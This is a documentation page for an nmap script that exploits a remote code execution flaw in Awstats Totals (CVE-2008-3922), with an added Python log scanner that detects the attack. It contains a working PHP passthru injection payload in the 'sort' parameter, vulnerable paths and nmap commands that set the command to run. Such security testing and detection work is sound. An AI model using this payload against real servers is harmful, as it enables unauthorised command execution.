http-awstatstotals-exec
Script type: portrule
Categories: vuln, intrusive, exploit
Script download URL: http://nmap.org/svn/scripts/http-awstatstotals-exec.nse
Exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other products based on it (CVE-2008-3922).
This vulnerability can be exploited through the GET variable "sort". The script queries the web server with the command payload encoded using PHP's chr() function:
?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}}
Common paths for Awstats Totals:
/awstats/index.php
/awstatstotals/index.php
/awstats/awstatstotals.php
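From the defender's side, the payload shape described above (the "sort" parameter carrying a PHP ${...} expression that calls passthru() on a chr()-built string) is easy to pick out of web server access logs. The following is an added example, not part of the NSE script or of this page: a small Python log scanner that flags requests whose "sort" parameter combines the ${ injection syntax with a PHP execution function, and decodes any chr() chain back into the command that was attempted so an analyst can triage it. The log lines are constructed samples, and the paths are the common Awstats Totals locations listed above.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not real traffic) for demonstration.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Oct/2023:13:55:36 +0000] "GET /awstatstotals/index.php?sort=pages HTTP/1.1" 200 5120
203.0.113.11 - - [10/Oct/2023:13:55:40 +0000] "GET /awstats/index.php?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}} HTTP/1.1" 200 812
203.0.113.12 - - [10/Oct/2023:13:56:01 +0000] "GET /awstats/awstatstotals.php?sort=%7B%24%7BpasstHRu%28chr%28105%29.chr%28100%29%29%7D%7D HTTP/1.1" 200 640
203.0.113.13 - - [10/Oct/2023:13:56:10 +0000] "GET /index.php?config=site1 HTTP/1.1" 200 4200
"""

# Pulls the request line ("GET /path?query HTTP/1.1") out of a common-log-format entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# PHP functions that execute OS commands; any of them inside ${...} is the tell.
EXEC_FUNCS = ("passthru", "system", "exec", "shell_exec", "popen")

# A run of chr(NNN) calls joined by '.', the encoding the documented payload uses.
CHR_CHAIN_RE = re.compile(r'chr\(\d{1,3}\)(?:\.chr\(\d{1,3}\))*', re.IGNORECASE)


def decode_chr_chain(expr):
    """Turn chr(117).chr(110)... back into the string PHP would build from it."""
    codes = re.findall(r'chr\((\d{1,3})\)', expr, re.IGNORECASE)
    return "".join(chr(int(c)) for c in codes if int(c) < 256)


def inspect_request(target):
    """Return a finding for a 'sort' parameter that looks like CVE-2008-3922 abuse, else None."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes once
    for value in params.get("sort", []):
        decoded = unquote(value)  # tolerate a second layer of encoding
        lowered = decoded.lower()
        # The injection needs PHP's ${ } syntax plus a call to an execution function.
        if "${" in decoded and any(f + "(" in lowered for f in EXEC_FUNCS):
            chains = CHR_CHAIN_RE.findall(decoded)
            return {
                "path": parts.path,
                "sort": decoded,
                "decoded_command": " ".join(decode_chr_chain(c) for c in chains) or None,
            }
    return None


def scan_log(text):
    """Scan access-log text and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        finding = inspect_request(match.group("target"))
        if finding:
            finding["client"] = line.split(" ", 1)[0]  # first field is the client address
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The check keys on the combination of "${" and an execution function rather than on the exact chr() sequence, so it still matches when the attacker changes the command or the case of the function name; the decoded command is recorded only to make the log entry readable for triage.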
References:
Script arguments:
http-awstatstotals-exec.uri: Awstats Totals URI including path. Default: /index.php
http-awstatstotals-exec.cmd: Command to execute. Default: whoami
http-awstatstotals-exec.outfile: Output file. If set, the output is saved to this file.
Other useful arguments when running this script: http.useragent - User Agent to use in GET requests
Usage:
nmap -sV --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd="uname -a", http-awstatstotals-exec.uri=/awstats/index.php' <target>
nmap -sV --script http-awstatstotals-exec.nse <target>
Sample output:
PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-awstatstotals-exec.nse:
|_Output for 'uname -a':Linux 2.4.19 #1 Son Apr 14 09:53:28 CEST 2002 i686 GNU/Linux
Author: Paulino Calderon
Compiled by VER007, http://www.ver007.com